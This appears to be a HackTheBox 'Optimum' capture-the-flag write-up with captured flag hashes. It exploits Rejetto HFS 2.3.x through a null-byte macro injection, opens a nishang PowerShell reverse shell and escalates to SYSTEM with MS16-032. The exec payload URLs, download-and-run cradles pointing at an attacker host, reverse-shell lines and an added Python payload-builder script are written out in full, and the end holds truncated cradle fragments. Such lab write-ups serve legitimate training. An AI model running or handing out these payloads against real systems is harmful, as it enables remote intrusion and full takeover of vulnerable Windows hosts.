Optimum
Last updated
IP: 10.10.10.9
User: d0c39409d7b994a9a1389ebf38ef5f73
Root: 51ed1b36553c8461f4552c2e92b3eeed
Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution
Rejetto HttpFileServer (HFS) is vulnerable to a remote command execution attack due to a poor regex in the file ParserLib.pas. The Metasploit module exploits the HFS scripting commands (macros), using '%00' to bypass the filtering. It has been tested successfully on HFS 2.3b on Windows XP SP3, Windows 7 SP1 and Windows 8.
MS16-032 - Microsoft Windows 7 < 10 / 2008 < 2012 R2 (x86/x64) - Local Privilege Escalation
Nmap
UDP
Port 80 in browser
Version number on the page and in the source code:
Searchsploit
Copy to current dir
Modify the file with
Requires nc.exe in the current directory, served by a web server on port 80 (the script fetches it from there), and a listener on port 443 for the callback.
Execute the script
Now you have a low priv shell
Proof
That's the easy way. There is also a Metasploit module. The harder way is by hand, via the web app.
Null bytes allow code execution: a search request of the form ?search=%00{.exec|<command>.} gets past the filter and runs the command.
Send that request to Burp Repeater and make the target ping your attacking host.
Use tcpdump on your host to see whether the ICMP echo requests arrive.
Now download nishang
Copy the nishang reverse-shell script to the local working folder (leave the repo copy unedited; the line below goes in this copy):
cp nishang/Shells/Invoke-PowerShellTcp.ps1 .
Add the following to the bottom of the file
Check that you can ping from PowerShell:
/?search=%00{.exec|C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe ping 10.10.14.2}
The SysNative path matters: HFS is a 32-bit process on 64-bit Windows, and SysNative is the redirector alias for the real 64-bit System32, so this launches 64-bit PowerShell rather than the WOW64 copy. The HFS macro delimiters are {. and .}, so add the trailing dot before the closing brace if the bare } form does not fire.
Check with tcpdump, which should show the echo requests.
Replace the ping with the following, which needs to be URL-encoded:
After a while you will have a Powershell shell.
Run systeminfo and Sherlock.ps1 from within PowerShell.
It appears it's vulnerable to MS16-032.
We do not have an interactive session, so the stock MS16-032 PoC (which pops a new SYSTEM console window) is no use here; instead download Empire, whose Invoke-MS16032 takes a -Command parameter and runs it as SYSTEM:
cp /root/Data/Lab/Hackthebox/HackTheBox/10.10.10.8/10.10.10.8/Empire/data/module_source/privesc/Invoke-MS16032.ps1
Modify with this line at the bottom
Copy existing powershell tcp script to shell.ps1
Amend the last line to the following and set up an nc listener on port 444:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.2 -Port 444
Execute the following from the low-privilege PowerShell shell:
Wait for a while and you will receive a system shell.
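As an added example (this is not code from the write-up, nor from the exploit-db script, nishang or Empire), the Python below builds every string the two procedures above send to the box: the %00{.exec|...} search payload that both the searchsploit script and the manual Burp approach rely on, the SysNative PowerShell download cradle, the Invoke-PowerShellTcp line appended to the nishang script, and the Invoke-MS16032 line appended to Empire's script. Hosts and ports (10.10.10.9, 10.10.14.2, 80/443/444) are taken from the write-up; the script filenames and the sample .ps1 text are constructed placeholders.

```python
"""Payload builders for the HFS 2.3.x null-byte macro injection chain.

Added example for the Optimum write-up; not the original exploit code.
Hosts/ports come from the write-up, file names are assumptions.
"""
from urllib.parse import quote_plus, unquote_plus, urlsplit

# HFS macro delimiters. The command goes inside {. ... .}. The leading %00 is
# what defeats the filter in ParserLib.pas and must reach HFS as a raw
# percent-sequence, so it is prepended here and never passed through
# quote_plus (which would turn it into %2500 and break the bypass).
MACRO_OPEN = "%00{."
MACRO_CLOSE = ".}"

# HFS is 32-bit; on 64-bit Windows SysNative is the redirector alias for the
# real 64-bit System32, so this path starts 64-bit PowerShell.
POWERSHELL = r"C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe"

# Constructed stand-in for nishang's Invoke-PowerShellTcp.ps1 (not the real file).
SAMPLE_PS1 = "function Invoke-PowerShellTcp {\n    # ... nishang body ...\n}\n"


def hfs_exec_url(rhost: str, rport: int, command: str) -> str:
    """GET URL that makes HFS run `command` through the exec macro.

    Only the macro body is URL-encoded; delimiters and %00 stay literal, which
    is exactly how the public exploit-db script assembles its requests.
    """
    body = quote_plus("exec|" + command)
    return f"http://{rhost}:{rport}/?search={MACRO_OPEN}{body}{MACRO_CLOSE}"


def download_cradle(lhost: str, lport: int, script: str) -> str:
    """PowerShell one-liner that fetches `script` from our web server and runs it."""
    return (f"{POWERSHELL} IEX(New-Object Net.WebClient)"
            f".DownloadString('http://{lhost}:{lport}/{script}')")


def stage_reverse_shell(ps1_source: str, lhost: str, lport: int) -> str:
    """Append the nishang invocation so the script calls back as soon as it is run."""
    return (ps1_source.rstrip("\n") +
            f"\nInvoke-PowerShellTcp -Reverse -IPAddress {lhost} -Port {lport}\n")


def ms16032_command(lhost: str, lport: int, script: str) -> str:
    """Line appended to Empire's Invoke-MS16032.ps1: run `script` as SYSTEM."""
    return (f'Invoke-MS16032 -Command "iex(New-Object Net.WebClient)'
            f".DownloadString('http://{lhost}:{lport}/{script}')\"")


def decoded_search_param(url: str) -> str:
    """What HFS sees after decoding the search parameter; use it to eyeball payloads."""
    raw = urlsplit(url).query.split("search=", 1)[1]
    return unquote_plus(raw)


if __name__ == "__main__":
    rhost, lhost = "10.10.10.9", "10.10.14.2"
    print("1. ICMP check:     ", hfs_exec_url(rhost, 80, "ping " + lhost))
    cradle = download_cradle(lhost, 80, "Invoke-PowerShellTcp.ps1")
    print("2. Low-priv shell: ", hfs_exec_url(rhost, 80, cradle))
    print("   HFS decodes to: ", repr(decoded_search_param(hfs_exec_url(rhost, 80, cradle))))
    print("3. shell.ps1 tail: ", stage_reverse_shell(SAMPLE_PS1, lhost, 444).splitlines()[-1])
    print("4. Empire tail:    ", ms16032_command(lhost, 80, "shell.ps1"))
```

Serve the .ps1 files from the directory where you run the web server on port 80, listen on 443 for stage 2 and on 444 for stage 4, then load the modified Invoke-MS16032.ps1 from the low-privilege shell with an IEX cradle like the one above.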
Evidence
git clone
/?search=%00{.exec|C:\Windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('
IEX(New-Object Net.WebClient).DownloadString("
")
git clone
Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('
')"
IEX(New-Object Net.WebClient).DownloadString("
")